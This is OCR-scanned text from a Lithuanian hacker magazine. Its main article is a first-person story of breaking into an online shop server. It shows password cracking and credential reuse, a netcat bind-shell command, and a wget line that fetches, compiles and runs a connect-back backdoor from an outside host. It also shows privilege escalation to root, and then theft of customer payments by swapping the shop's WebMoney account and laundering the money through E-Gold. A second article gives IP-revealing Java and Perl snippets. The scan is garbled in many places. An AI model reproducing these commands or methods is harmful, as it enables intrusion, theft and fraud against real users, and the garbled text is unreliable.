dėlto čia aš prisiminiau tarpinius perrinkimo variantus, todėl 
nusprendžiau juos čia išbandyti. Brutforserio opcijose aš radau 
keturis perrinkimo variantus: skaičius, specialius simbolius, ma- 
žąsias ir didžiasias raides. Pradėjau nuo skaičių, tačiau perrin- 


kimas nedavė ypatingų rezultatų. Tuomet aš sugalvojau pamė- 
ginti su skaičiais ir specialiaisiais simboliais, mažai tikėdama- 
sis sėkmės. Aš paleidau MD5Inside, suteikiau jai aukšta priori 
tetą ir išėjau į svečius puodeliui arbatos. Grįžęs namo pama 
čiau, kad perrinkimas jau baigtas, 0 admin vartotojo slaptažo- 
dis atrodė štai taip: 12.1982. Greičiausiai administratorius nu 
sprendė kaip slaptažodį panaudoti savo gimimo datą, tuo pačiu 
supaprastindamas įsilaužėlių darbą. 

Toliau man reikėjo apsispręsti ką daryti su surastu slaptažo 
džiu? Eiti su juo į forumą nesinorėjo adminas gali peržiūrėti 
paskutinių prisijungimų logus ir aptikti nesankcionuotą priėjimą. 
Teliko surastą datą išbandyti vietoje slaptažodžio su kitais servi 
sais. Administratoriaus paštas buvo saugomas serveryje ram 


[Kas man padėjo įsilaužti?] 

1. Kasdieninis bugtrag lankymas lėmė tai, kad aš iš karto 
supratau, kaip galima nulaužti interneto parduotuvės svetai- 
nėje įdiegtą forumą. 

2. Aš nepatingėjau patikrinti vartotojo admin teisių. Admi- 
nistratoriai dažnokai pamiršta, kad pilnas priėjimas prie sis- 
teminių lentelių gali sukelti sunkių pasekmių. 

3. Sukeliant savo teises iki root man labai padėjo pseudoter- 
minalo darbą emuliuojantis įrankis :). 
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bler.ru, tačiau vargu ar jo pašto dėžutėje buvo kokios nors nau- 
dingos informacijos. Tačiau man vis tiek magėjo patikrinti, ar tiks 
jo slaptažodis, todėl aš prisijungiau prie pop3.rambler.ru ir pa- 
bandžiau autentifikuotis vartotojo adminmag vardu. Nelaimei, ser- 
veris atmetė autorizaciją ir pasiuntė mane kur nors toliau. Tačiau 
aš nė neketinau kur nors eiti, todėl Kapsčiausi toliau. 


[Supuvęs MyS0LĮ] Aš visiškai nuskenavau sistemą. Šiame dar- 
be aš panaudojau intelektualų XSpider skenerį (tiesa, demo 
versiją). Savaime suprantama, skenerį aš paleidinėjau iš anks- 
to prisijungęs prie saugaus Europoje esančio VPN serverio. Pir- 
masis skenavimas buvo toks lėtas, kad aš atjungiau web skrip- 
tų ir kitokios bjaurasties testavimą. Galiausiai prieš mano akis 
išryškėjo dvi įdomios išvados: 

1. Sistemoje buvo iš išorės prieinamos šios jungtys: 21, 80 ir 
3306 

2. Nutolęs FingerPrint parodė, kad serverį valdo RedHat 9.0 
operacinė sistema 


Prisijungęs prie 21 jungties aš pamačiau standartinę WuFTPD 
serviso antraštę. Kaip žinia, šis servisas ypatingai skylėtas ir 
kiekvieną mėnesį jame aptinkamas ne vienas naujas pažei- 
džiamumas. Vis dėlto administratorius šia problema pasirū- 
pino: demono versija buvo nepažeidžiama, 0 anonymous var- 
totojo niekas neleido į sistemą. Kažkodėl aš pagalvojau, kad 
serviso antraštė man padės sužinoti operacinės sistemos ver- 
siją. Nukeliavęs į Google su specialia užklausa, aš pradėjau 
žarstyti šimtus atsakymų. Kai kurie iš jų mane informavo, 
kad ši versija iš tiesų buvo pateikiama su dešimta Raudon- 
kepuraite (RedHat). Taip man pavyko nustatyti operacinės 
sistemos tipą. 
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Nulaužtos parduotuves svetainė, nuo kurios viskas ir prasidėjo 


MDS51nside 


Fie Iooė Zearch 7 


| Name Password 


| adris ODF7FBF7CE710692105719467A0F7E1E 12.1982 
(Bl magadė 20A13 SAE211171C715A2E570465 

IBiokus T IFF2ECF94263E18317491290 

Birastos 2085187AD2A01C8786CA19C04C 768732 

vė 26938F50474E84A6202F66295 394 A59C 


Vienas iš siaptažodžių pasidavė hakerio spaudimui! 


O Apache buvo nepažeidžiamas. Čia buvo įdiegtas paskutinis 1.3 
šakos leidimas be jokių papildomų modulių, išskyrus mod php. 
Prisijungimas į 3306 jungti parodė, kad serveryje paleistas MySOL, 
tačiau demonas niekaip nenorėjo išduoti savo versijos. Nežinau 
kodėl, tačiau aš užsimaniau prie duomenų bazės prisijungti su 
langinių klientu ką tik nugvelbto vartotojo vardu. Ir neklydau: ser- 
veris mane sėkmingai autorizavo su vartotojo vardu admin ir slap- 
tažodžiu 12.1982. Su WinMysą! klientu man pavyko tiksliai nu- 
statyti serviso versiją ir peržiūrėti visas lenteles. Tiesą sakant, DB 
sistemoje be mysą!, test ir mag forum duomenų bazių daugiau 
nieko nebuvo, tačiau tas faktas, kad prieš tai gautas slaptažodis 
tiko ir šiam servisui, man kėlė įdomių minčių. Ir čia aš prisiminiau 
dar vieną nuostabų eksploitą. Jis leido vykdyti bet kokias koman- 
das mysąld vartotojo vardu. Tačiau paties eksploito aš netesta- 
vau, mano virtualus draugelis šį kodą buvo išstudijavęs nuo gal- 
vos iki kojų, mokėjo užmerktomis akimis keisti skirtingoms su OS 
suderintus shellkodus ir realiai gauti shellus. Aš kreipiausi į jį 
pagalbos, kad pakeistų eksploito išeities tekstus ir pritaikytų juos 
RedHat 9.0 sistemai. Šiaip tai man reikėjo pakeisti libso.so.0 
biblioteką, tačiau jos kodas unikalus kiekvienai sistemai. Mano 
bičiulis mielai mane išgelbėjo, nors iš pradžių tiktai mestelėjo 
nuorodą į dokumentaciją, tačiau jam buvo atsakyta, kad aš pra- 
stai moku angliškai :). 


Taigi pakeitęs kode du kintamuosius, user ir pass, aš paleidau 
eksploitą ir pamačiau eilutę „Now use your fav shell and Is / 
tmp/id -I“. Galima buvo suprasti, kad eksploitas veikia ir realiai 
vykdo sistemai siunčiamą kodą. Dabar man reikėjo suformuoti 
nuotolinę shello paleidimo komandą. Užkomentuota užklausa 
„Jusr/sbin/nc -I -p 8000 -e /bin/bash“ kuo puikiausiai paten- 
kintų mano poreikius, tačiau aš nebuvau tikras, ar sistemoje 
yra netcat. Beje, pagal nutylėjimą jis buvo įdiegiamas į raudon- 
kepuraitę, todėl aš atkomentavau šią eilutę ir vėl paleidau kenks- 
mingąjį kodą. Jis vėl buvo įvykdytas be problemų, tačiau aš ne- 
galėjau prisibelsti iki 8000 jungties man trukdė ugniasienė. 
Tuomet man teko internete ieškoti connback bekdoro kodo, per- 
siųsti ji į shellą ir tuomet visa tai paleisti. Visus šiuos veiksmus 
aš atlikau vienoje komandoje: 


r571pb2.pl [server] [/folder/] [member id] [targėt] 


= host where IPB installed 
- foider where IPB installed 
1d for bruteė 


[server] 
[/žolder/) 
[member 14] - user 


targets: 


(c)oded by 1dt.vOif 
RST/GHC , http://rst.vocid.ru , http:/ 
[roorūfaztZ service]Ą perl ibb.pl fastfocd.danva.net / 1 1 
] SEFVEP : fastfocd.danva.net 

PATH : ; 
MEMBER IL ; 1 
] TARGET : 1 - IPB 2.“ 
] SEARCHING PAZ3WORD ... 


ghc.ru 


[ POME ] 


HMEMBER ID : 1 
MEMBER LOGIN KEY : 


Sekmingas IPB nu/aužimas 


Šemd  wget hos!31337 .narod.1u/cb.c O /imp/cb.G; gec /imp/cb.c o Amp/cb; Amp/ 
bi 


Čis 1141111.11 mano nulaužto shello IP adresas. Šioje 
mašinoje aš paleidau netcat ir klausiausi 5544 jungties. Palei- 
dus eksploitą, atsirado pasveikinimas ir sėkmės linkėjimas ko- 
vojant nelengvame virtualiame mūšyje :). Taip aš gavau shellą, 
veikiantį virtualios parduotuvės serveryje. 


[Kova už „root“ teises] Aš iš pirmo žvilgsnio supratau, kad 
turiu reikalą su realiu išskirtiniu serveriu, kuris veikė vieno 
žymaus hosterio duomenų centre. Jei kalbėsime apie ap- 
saugą, tai čia viskas buvo atlikta konkretaus permission de- 
nied lygyje :). Aš net negalėjau peržiūrėti svetainės turinio. 
Tačiau nenuleidau rankų ir toliau sistemos saugume ieško- 
jau Išganingosios skylutės. Mano teisės buvo lygios mysą/d 
vartotojo igaliojimams — būtent šio vartotojo vardu buvo 
paleistas duomenų bazių demonas. Branduolio nulaužimą 
buvo galima iš karto pamiršti — devintosios versijos redhat 
branduolys negarsėja jokiais eksploitais. Iš servisų buvo pa- 
leisti tik ex/im, mysąld ir httpd. Aš jau beveik norėjau sudėti 
ginklus ir apsiriboti tuo, ką jau pasiekiau (maniau, jog tai 
maksimumas), tačiau prisiminiau, kad aš prieinu prie 
mysąld. Kažkodėl prisiminiau tipišką administratorių klai- 
dą: daugelis jų mėgsta skirtingiems servisams priskirti vie- 
nodus slaptažodžius. Mysą!.user lentelėje aš greitai sura- 
dau root hešą ir degiau noru jį dešifruoti. Tačiau MD5!Insi- 
de atsisakė atpažinti MySOL formatą, todėl aš šį sudėtinga 
darbą patikėjau kitam brutforseriui ir sniferiui viename :). 
Jo pavadinimas — CainėAbel (www.oxid.it/downloads/ 
ca setup.exe). | skyrelį Cracker- > MySOL Hashes užkrovęs 
root hešą, aš pridėjau 6 svarius žodynus. Perrinkimo proce- 
sas baigėsi trečiame žodyne — slaptažodis buvo vfufpby, 
kas žvilgtelėjus į rusiškos klaviatūros raides reikštų „Magazin“ 
(„parduotuvė“). 


Vis dėlto iš karto gauti root teises buvo neįmanoma. Norint 
paleisti programą su, reikėjo pseudoterminalo palaikymo. Kaip 
tu jau tikriausiai supratai, aš jo tikrai neturėjau, kadangi shel- 
las buvo vykdomas interaktyviu režimu. Šioje situacijoje buvo 
galima arba parinkti kito sisteminio vartotojo prisijungimo duo- 
menis, arba pakišti pseudojrenginio palaikymą. Pirmasis va- 
riantas iš karto atkrito, kadangi ugniasienė filtravo 22 jungtį. O 
apie antrąjį variantą aš turėjau tam tikrų realių minčių. Kažka- 
da seniai su manimi kai kas pasidalino vienu įdomiu įrankiu, 
kuris vadinosi ttyX. Šią programą sudarė serveris ir klientas. Iš 
pradžių buvo paleidžiamas serveris, o po to prie jo prisijung- 
davo klientas. Finale buvo galima tokiomis pat teisėmis gauti 
priėjimą prie shello, tačiau jau su pseudoterminalo /dev/ttypO 
palaikymu. Aš persiunčiau ar- 
chyvą į serverį, išpakavau jį į 
katalogą /tmp/ttyX ir paleidau 
programą ./Zatron — tai buvo 
i Jė tty pseudoterminalinio serverio 
Ka demonas. Po to aš aktyvavau 

)4 bylą ./Jerky su parametru 
127.0.0.1. Vos po sekundės 
aš jau mėgavausi shellu su su- 
klastotu /dev/ttypO. Iš karto po 


Root teises jau kišenėje :) 


to aš paleidau programą /bin/su, kuri nesikeikė, kad nera ter- 
minalo, tačiau tuo pačiu klausdama slaptažodžio neįjungė „še- 
šėlinio“ režimo. Paskutinė palankios fortūnos šypsena man 
buvo sutapęs su mysą/ slaptažodžiu sisteminio root vartotojo 
slaptažodis. 


[Nedidelis defeisas| Root vardu aš galėjau daryti bet ką, 
tačiau kažkodėl norėjau tik vieno — pinigų :). Aš užėjau | kata- 
logą su www dokumentais bei skriptais ir pradėjau kapstytis 
interneto parduotuvės varikliuke. Iš pradžių norėjau kode pa- 
likti bekdorą, tačiau po to man iškilo noras parašyti administ- 
ratoriui apie visas klaidas ir nekišti rankų į visą šią bjaurastį. 
Vis dėlto aš apsistojau ties trečiuoju variantu -— man į galva 
šovė mintis puslapyje su rekvizitais nurodytą WMZ pakeisti ki- 
ta sąskaita. Adminai tai pastebės ne iš karto, o pinigėliai te- 
kės visai kita kryptimi. Kaip tariau, taip ir padariau: greitai 
užsiregistravau naują sąskaitą, kurią ir nurodžiau svetainėje 
pateiktuose kontaktuose. 

Paaiškėjo, kad ne aš vienas mėgstu mokėti per WebMoney. Po 
poros dienų man į sąskaitą įkrito 200 dolerių, o dar po dienos 
aš gavau papildomą šimtuką. Pagalvojęs, kad tokia betvarkė 
bus būtinai išaiškinta, aš pradėjau mastyti apie galimas išeitis. 
Ir čia į galvą man šovė nuostabi idėja — iš pradžių aš viską 
persiunčiau į WMZ < > E-Gold apsikeitimą, o po to pinigus 
nukreipiau į kitą E-gold identifikatorių. Po to jau per kitą apsi- 
keitimą visus pinigėlius aš pervedžiau į savo tikrąją sąskaitą. 
Darbas buvo malonus ir švarus :). 


[Sunkios pasekmės] Tikriausiai administratoriui buvo iš tiesų 
nesaldu, kadangi vargšai klientai pradėjo klausinėti, kodėl jų 
pinigai iškeliavo nežinoma kryptimi. Kitą dieną po eilinio mate- 
rialinės padėties pagerėjimo aš pastebėjau du dalykus: foru- 
mas svetainėje buvo visiškai pašalintas, nė vienas slaptažodis 
negaliojo. Po paros mano sąskaita taip pat buvo užblokuota. 
Beje, tai buvo padaryta tik dalinai: įeiti buvo galima be proble- 
mų, tačiau nebuvo galima atlikti jokių veiksmų. Tikriausiai Web- 
Money administracija nusprendė pagauti mane, atsekdama |P 
adresus. Tačiau aš nepamiršau saugumo ir į jų resursą jungda- 
vausi tik per VPN+S0CKS. Sutik, jog tikrai nėra malonu, kai kas 
nors kitas sužino apie tavo darbelius. 

Dabar mano kapitalas padidėjo keletą kartų. Bet aš iki šiol 
ieškau internetinės parduotuvės. Tik šį kartą ne tam, kad 
nulaužčiau, o kad įsigyčiau ką nors vertingo. Įsigysiu ten, kur 
egzistuoja automatinis sandėrių apiforminimas taip bus 
patikimiau :) 


Dar vienas slaptažodis 
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ant stalo. Praktika rodo, jog 
visi serveriai, apie kuriuos in 
formacija yra viešai prieina- 


ma, nesuteikia jokio anoni- 


Plepus asilas miškumo ir jais naudotis ne 


derėtų. Be abejo, vietoje ko 


ANONIMIŠKUMO PROBLEMA IŠKILO KARTU kio nors proxy serverio galima pa agpTĖESĄ 


SU INTERNETO ATSIRADIMU IR KASMET JI Pasinaudoti greitu sochs ser 
TAMPA VIS AKTUALESNĖ. DAUGYBĖ Aaaa a pa siNkaciją a 
ŽMONIŲ MOKA SVARIAS SUMAS UŽ pasisiėpus po trimis VPN au Une 
ŠVIEŽIUS PROXY SERVERIŲ SĄRAŠUS, sijungimais, isilaužėlį vis tiek siėkivi 555 
PRIĖJIMĄ PRIE VPN ŠLIUZŲ IR LABAI galima nustatyti. Tai daroma bi 
RUPINASI SAVO PAČIŲ ANONIMIŠKUMU. Ie "2 midaus Panis resursuose, kuriuose tau 
Lee A M ESUDĖTKGŲ siūlo patikrinti savo anonimiškumą? Esu tikras, jog tu ten buvai. 
Panašios technologijos leis sužinoti, ar tavo saugumas iš tiesų 
BŪDŲ, LEIDŽIANČIŲ PRIEITI PRIE JŲ TAIP tobulas. Paprastai po tokio testavimo vartotojas savo anoni 
KRUOPŠČIAI SLEPIAMOS INFORMACIJOS. Nagi a Atėjo laikas pašnekėti apie pa- 
SUŽINOTI REALŲ IP KOMPIUTERIO “** 46 SRG Sa, 
PARAMETRUS, VARTOTOJO BUVIMO VIETĄ, [Klastingi kintamieji] Praktiškai visos naršyklės, besikreipian 
NAUDOJAMĄ PROXY, —JOKIŲ PROBLEMŲ! čios į web serverį, užklausoje apie klientą perduoda daugybę 
DABAR AŠ TAVE IŠMOKYSIU ELEKTRONINIO /domios informacijos, kuri nėra pilnai susijusi su užklaustu do- 
ŠPIONAŽO PAGRINDŲ kumentu. Iš tiesų, absoliučiai visos šiuolaikinės naršyklės be 


būtinų laukų, kuriuos apibrėžia HTTP specifikacija, REMO 
TE ADDR bei HTTP USER AGENT tipo laukuose perduoda ir 


Sužinok ką tu papasakoji daugybę neprivalomų duomenų. Savaime suprantama, kad jei 
: ž a 4 gu naršymui tu naudoji telnet.exe, tai tau neiškils jokių proble: 
aple save dirbdamas internete mų: rašai GET /file.html ir išliksi visiškai anonimiškas. O jeigu tu 


[Didysis brolis] Apsisaugojimo nuo pašalinių akių me- pirmenybę teiki IE, tada vertėtų apie šią problemą susimąstyti. 
todai yra skirtingi. Pats primitywiausias būdas — dirbant Juk web serveriui perduodama informacija gali būti Ignoruoja- 
internete naudoti proxy serverius. Tačiau niekam ne pa- ma, tačiau gali būti ir įrašyta į logus, kuriuos generuoja specia- 
slaptis, jog ne visi proxy serveriai savo klientams užtikri lus skriptas. Skriptas gali būti iškviečiamas tiek per SSI, tiek Ir 
na anonimiškumą. Kai kurie iš jų direktyvoje X FOR- bet kokiu kitu būdu. Šnipinėjančiame skripte nebus jokio gud- 
WARDED FOR rodo realų IP kiti registruoja logus, kurie raus ar ypatingo kodo, jis tiesiog įrašys svarbius kliento duome- 
po pirmos teisėsaugininkų užklausos pateks kam reikia nis. Tai galima padaryti, pavyzdžiui, taip: 


Įšnipinėjantis kodas, skirtas logų sukūrimui] 


4 us: /bin/perl 

print “Content-type: text/htmNnkn"; 

open(L0G, “ > > /var/log/clients"); 

print LOG “Client: SENV (REMOTE ADDR), SENV4 HTTP USER AGENT), SENV( HTTP RE- 
FERER Nn"; 

print LOG “Proxy: SENV( HTTP FORWARDED FOR) SENV4 HTTP VIA“; 

dose(L06); 


Ką daro šis skriptas? Pirmoje jo dalyje atliekamas pagrindinių 
aplinkos kintamųjų registravimas. Čia užfiksuojami: kliento IP 
adresas, informacija apie naršyklę, taip pat URL, iš kurio lanky- 
tojas atėjo į šį puslapį. Atrodytų, kas čia tokio? O iš tiesų su 
tokiu registravimu apie vartotoją galima sužinoti daugybę nau- 
dingos informacijos. Konkrečiau šnekant, pagal tokį logą gali- 
ma lengvai nustatyti, iš kokios šalies šis vartotojas ir kokia jo 
operacinė sistema. Netiki? Be reikalo. Sudarinėdama užklau- 
są, tavo naršyklė į User-Agent lauką įrašo tokio pavidalo eilutę: 


[Kaip kompiliuoti „Java“ programas?] 

Įdomus ir prasmingas klausimas :). Iš tiesų, programavimas 
su Java yra ypatingai patrauklus dalykas, todėl pas save įdiegti 
java programuotojo komplektą galima tiesiog iš smalsumo. 
Pirmiausia užeik į Attp://java.sun.com/j2se/1.4.2/ 
download.html ir įsitikink, kad Java SDK užima daugiau nei 
šimtą megabaitų. Parsisiųsk visą SDK ir jį įdiek. Kataloge, 
kuriame jį įdiegei, bus keletas katalogų ir bylų, tačiau visi 
pagrindiniai tau reikalingi įrankiai yra kataloge |bin. Visi išeities 
tekstai kompiliuojami su kompiliatoriumi javac.exe: 

javac source.java 


Paruoštą bait-kodą galima įvykdyti paleidus java.exe ir vietoje 
parametro perdavus vykdomos bylos pavadinimą: 
java byte.java 


Mūsų atveju mes susidūrėme su apletais ir juos reikia paleisti 
arba su appletviewer, arba tiesiogiai per naršyklę. Tam reikia 
sukurti maždaug tokio turinio Atm! bylą: 


Java SDK parsisiuntimo puslapis 


Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; II) 

Lengva pamatyti, jog šiuo atveju pas vartotoją įdiegta WinXP sis- 
tema, taip pat šešta IE versija. Be to, agento eilutėje aiškiai 
matosi lietuvių kalba. Jeigu koks nors karderis su tokiu 
HTTP USER AGENT pabandytų prasukti neteisėtą tranzakciją, 
tai antisukčiavimu užsiimantys žmonės greitai suprastų tikruo- 
sius jo ketinimus. Žiūrim toliau. Kintamasis HTTP REFERER taip 
pat gali išduoti įsilaužėlį. Jeigu skriptas užregistruos, jog neva 
amerikietis kortelės savininkas į interneto parduotuvę užėjo iš 
mail.lt svetainės, tai šios elektroninės parduotuvės saugumo 
tarnybai iškils labai daug klausimų. 

Ir, galų gale, atėjo laikas pašnekėti apie IP adresą. Jeigu varto- 
tojas naudos proxy serverį, tai į kintamąjį REMOTE ADDR bus 
įrašytas proxy serverio IP adresas. Tačiau neverta džiaugtis anks- 
čiau laiko. Yra specifiniai proxy serverių aptikimo metodai, kurie 
aktyviai naudojami daugelyje portalų. 

Atkreipk dėmesį į šeštą prieš tai pateikto skripto eilutę. Ten 
registruojami du kintamieji: X FORWARDED FOR ir HTTP VIA, 
Tuo atveju, kai vartotojas naudoja įprastinį proxy serverį, pirma- 
me kintamajame yra jo tikrasis IP adresas, 0 antrame — proxy 
serverio IP adresas ir prievadas, per kurį jis veikia. Beje, net ir 
tuo atveju, kai proxy serveris yra visiškai anonimiškas, HTTP VIA 
kintamasis gali būti netuščias. Labai svarbu tai patikrinti prieš 


anoniminių proxy serverių sarašas, iš kurių didžioji dalis nesuteikia jokio anonimiškumo 
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panaudojant tokį proxy neteisėtais tikslais. Kai kurie elektroni 
niai resursai tiesiog neaptarnauja per proxy serverį į svetainę 
besijungiančių klientų. 

[„JavaScript“ — liaudies priešas] Tu niekada nesusimąstei, 
kodėl daugelis vartotojų nepasitiki JavaScript programomis ir 
savo naršyklėse išjungia šios technologijos prijungimo galimy- 
be? Iš tiesų, su JavaScript apie vartotojo mašiną galima gauti 
kai kuriu konfidencialių duomenų. Aš papasakosiu, pavyzdžiui, 


apie tai, kaip sužinoti maksimalią ir einamą ekrano skiriamają 
gebą, laiką bei procesoriaus tipą: 


script language "javascrip n' 


J0cument. write novigator.oppName) 


navigator.cpullass) 


(“You ore using 
document.write ("CPU type 
("Screen Resolution; “ + screen.width + X" 


document.write screen.height) 


document.write ("Available Screen Resolution: “ + screen.availWidth + x" + scre- 
en.ūvailHeight) 
document.write (“Screen Color Depth: “ + screen.colorDepth) 
today new Datel) 
document.writeln(“Date £ time on your computer and time zone is: “ + today) 


document .writeln(“ Date £ time in your locale format: “ today.toLocaleString()) 


/stipt 


Siame pavyzdyje tiksliai ir aiškiai įvardinama naršyklė, taip pat 
pateikiama maksimali galima bei einama ekrano rezoliucija ir 
lokalus laikas. Sutik, nemalonu, kai tokia informacija išsaugo 
ma kažkieno loguose. Ypatingai tai pasakytina apie laiką: juk 
pagal laiko juostą galima nustatyti šalį ir lengvai susekti tinklo 
tvarkos pažeidėjo buvimo vietą. 


[„Java“ — blogio šaltinis] Tačiau JavaScript padaro gerokai 
mažesnius nuostolius, lyginant su tuo, ką sugeba Sun Micro- 
systems dukrelė Java. Jeigu tu iki šiol leidi krautis bet kokiems 
Java apletams, tai tau vertėtų susimąstyti apie savo saugu- 
mą. Juk yra ganėtinai paprastų programų, kurios leidžia suži- 
noti tavo realų IP adresą, net jeigu tu dirbi per socks serverių 
grandinę. 


get env.jad - DJ Java Decompiler "> 
Fe EM Search View Settings Language Įook Hep 
1=H43 r a - = Ei "48 a - 
+ 
+ i : 


Iš tiesų IP adreso nustatymo mechanizmas paprastas iki absur 
do. Išmėginti šio metodo tau nesutrukdys net tas faktas, jog tu 
nieko nesupranti apie Java programavimą :). Pagrindinė idėjos 
esmė į šnipinėjančią svetainę įdėti nematomą aplet: 
su standartiniu tinklo komponentu java.net sukurs soketa su 
tavo mazgu ir aktyvuos skripto paleidimą, kuris į logą įrašys kliento 
(t.y. tavo :)) IP adresą. 

Savaime suprantama, tai bus būtent realus IP adresas, 
gi java programos bait-kodą vykdo virtuali mašina Ir, 
susijungimas bus tiesioginis, nenaudojantis naršyklės nustaty 
muose nurodyto proxy serverio. 

Toki metodą galima būtų panaudoti net ir įdiegiant antisukčiavi- 
mo sistemą. Pabandykime trumpam įsivaizduoti, jog niekšas 
įsilaužėlis iš amerikietiškos internetinės parduotuvės bando nu 
gręžti porą tūkstančių dolerių. Kaip ir priklauso, jis | elektroni 
nės parduotuvės svetainę užeina per socks serverių grandinę II 
pradeda savo juoduosius darbelius. Įvedinėdamas suklastotus 
duomenis, mūsų herojus neatkreipia dėmesio į tai, jog viena 
me iš puslapių užkraunamas nematomas java apletas, kuris 
svetainės adminams ir išduoda visą informaciją apie jo realų IP 
Be to, panaudojus standartinius java metodus, 
sužinoti ir lokalų kliento tinklo sąsajos ip adresą. 
Tarkim, jeigu vartotojas dirba lokaliame tinkle ir išeina į Interne 
tą per NAT, tai su pirmuoju būdu tu gausi išorinį tinklo šliuzo IP 


KUTtS 


kadan- 
žinoma, 


visiškai realu 


JAVA is enabled 


VBScript is enabled and working. 
JavaScript is enabled and working: 


Y re using: 
Microsolt Internet Explorer MSIE 6.0 
[ĮMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MylE2j| 


CPU type: xB6 
Screen Width: 1024 Screen Height: 768 
Available Screon Width: 1024 Available Screen Height: 718 
Screen Color Depth: 32 


terb conven Tu [82.153.146 135] 


(Your Domain name[Real r 


"PC 1 name [IP ims 


ava'| proxy serveris — ne kliūtis! 
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adresą. Bet, pasirodo, galima gauti ir lokalios tinklo sąsajos 
adresą: tai daroma su standartiniu metodu InetAddress.getLo- 
calHosti). 

Kad visa mano šneka nebūtų vien tik tušti žodžiai, aš pateiksiu 
kodo pavyzdį, kuris prisijungia tiesiogiai prie web serverio ir ten 
įvykdo CGI skriptą, kuriam vietoje parametrų perduodamas kom- 
piuterio lokalios tinklo sąsajos adresas ir jo pavadinimas: 


[java apletas, skirtas realaus IP adresa nustatymui] 
import java.applet.Applet; 

import java.awt.'; 

import java.io.“; 

import java.net.“; 

public dass te extends Applet ( 


Socket sack; 
DatalnputStreom In; 
String res; 
InetAddress | ip; 
Sting s ip 

public void init() ( 
ty ( 


I ip — InetAddress.getLocalHost(); 

s ip=l ip.toString()); 

Socket sock = new Socker(“217.10.40.71“, 80); 

PrintStream printstream — new PrintStream(sock.getOutputStream()); 
printstream.printin(“GET /script.pl?ip “+ 5 ip + NY"); 
in new DatalnputStream(sock.getlnpulStream()); 

tes InreadLine(); 

printstream.close(); 

sock.doss(|); 

| catch (IOException e) | 

)) 


[Apsisaugok pats] Tikiuosi, įtikinau tave, kad kai labai nori ir 
tau šiek tiek sekasi, per naršyklę gali sužinoti praktiškai viską, 
ką vartotojai taip kruopščiai slepia: realų IP lokalaus įrenginio 
adresą, sisteminius parametrus, laiko juostą ir sistemos Iokali- 
zaciją. Tačiau laiku pagalvojus apie apsauga, visus šiuos šnipus 
galima lengvai apgauti. 

Visų pirma, būtina atjungti Java ir JavaScript. Jeigu tu naudoji 
Internet Explorer, tai galima padaryti papildomose naršyklės sa- 
vybėse. Vis dėlto ši naršyklė yra labai užsispyrusi, todėl gali nu- 
tikti Ir taip, kad kalbų suderinamumas nebus deaktyvuotas. Pa- 
tikrinimui rekomenduočiau parašyti nedidelę maždaug tokio tu- 
rinio HTML bylą: 


< script languoge = "JavaSaipt" > 

< 1--document.write (“< JavaScript is enabled and working.) > 
< noscipt > 

< hl All done 

< /noscript> 

< /saript> 


Šiame fragmente <!-- —> reiškia, jog čia esančios kodo eilu- 
tės vykdomos tik tuo atveju, kai yra aktyvuota JavaScript arba 
bet kurios kitos aukščiau nurodytos kalbos (<script langua- 
ge=""> direktyva) galimybė. Jeigu viskas gerai, bus įvykdytas 


tarp <noscript> </noscript> tagų esantis kodas, kurio turinys 
informuos mus apie normalią apsaugą. 

Vis dėlto sudėtingiausias dalykas — Java galimybės atjungimas. 
Jeigu tavo kompiuteryje įdiegtas SDK, tai gali būti taip, jog nu- 
ėmus vieną IE nustatymų varnelę tau nepavyks atsisakyti jos 
galimybės. Dėl to internete yra labai daug programų. kurios 
draudžia užkrauti Java apletus. Siūlyčiau tau paieškoti tokių da- 
lykų ir išsirinkti geriausią programą. 

Taip pat pastebėsiu, jog tiesioginių Java soketų sukūrimą gali- 
ma uždrausti su bet kokia ugniasiene. Pakanka ją sukonfigū- 
ruoti taip, kad ji klaustų leidimo išleisti programą į internetą. 


[Anonimiškumo patikrinimas| 

Žemiau aš pateiksiu žinomas svetaines, kurios skirtos web 
anonimiškumui patikrinti. Būtinai aplankyk jas visas, kadangi 
šie resursai vienas kitą papildo. 

1. http://Ieader.ru/secure/who.html 

Šis skriptas leidžia įvertinti bendrą tinklinį anonimiškumą. Čia 
tau rašomas einamas IP adresas, naršyklės versija, jos modi- 
fikacijos (jeigu tokių yra), user-agent, operacinė sistema, pro- 
xy serverio buvimas ir grandinėje esančių proxy serverių skai- 
čius. Be to, čia galima pamatyti paskutinio proxy serverio adre- 
są ir prievadą bei jo pašto serverį. Antrojoje patikrinimo dalyje 
tu gausi einamą ir maksimalią galimą ekrano rezoliuciją, Java/ 
JavaScript/VBScript darbo būseną, laiką ir dar daug kitokių įdo- 
mių dalykų. 

2. http://shadowsecurity.net.ua/r/checking.shtml 

Trijų stadijų patikrinimas, kuris nustato, ar prisijungta per proxy 
serverį. Šis skriptas analizuoja einamą proxy, ir jeigu jis yra — 
pateikia išsamius jo duomenis. Toliau jis siūlo patikrinti lais- 
vai pasirinkto proxy serverio anonimiškumą, o trečiuoju žings- 
niu suteikia pilną informaciją apie kiekvieną aplinkos kinta- 
mąjį. Čia taip pat galima rasti ir saugumo rekomendacijų bei 
informacijos apie env kintamųjų modifikaciją. 

3. www.stilllistener. addr.com/checkpoint1 

Dar išsamesnis anonimiškumo patikrinimas. Čia be CGI kin- 
tamųjų proxy serverį galima įvertinti 5 balių skalėje, taip pat 
praeiti testus su šnipinėjančia Java programa, kuri bando su- 
žinoti tavo realų adresą, intranetinį IP adresą bei lokalų laiką. 


"suss r assas: 


EE5 tr domeno inform. 
Atvirų 


Trojos erkių paieška" 
ar 
Os skaiavnės 
Traceroute ir Ping Iš skirtingu vietų 
Patikninti svetimų Cookies tinkamuma 
Gaidi kompiuterio vardą Ir diskų info: L] 


leader.ru patikrinimas 
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Sisteminis Maskaradas 


NIEKAM NE PASLAPTIS, KAD NULAUŽTAME 
SERVERYJE GAVUS ROOT TEISES, DAUGE- 
LIS HAKERIŲ Į SISTEMĄ ĮDIEGIA ROOTKITĄ, 

TAIP NORĖDAMI ĮSITVIRTINTI MAŠINOJE IR 
IŠSILAIKYTI JOJE KAIP ĮMANOMA ILGIAU. 

ŠIAIP JAU INTERNETE GALIMA SURASTI DE- 
ŠIMTIS ĮVAIRIAUSIŲ PROJEKTŲ, DAUGELIS 
IŠ KURIŲ YRA TIKRI PROGRAMUOTOJŲ DAR- 

BO ŠEDEVRAI IR LEIDŽIA UŽMASKUOTI ĮSI- 

LAUŽĖLIO BUVIMĄ SISTEMOJE TAIP KAD 
APIE TAI NESUPRAS NET IR PATYRĘS ADMI- 

NISTRATORIUS. TAČIAU PRAKTIKA RODO, 

KAD NE VISADA TIKSLINGA ĮDIEGINĖTI SUN- 
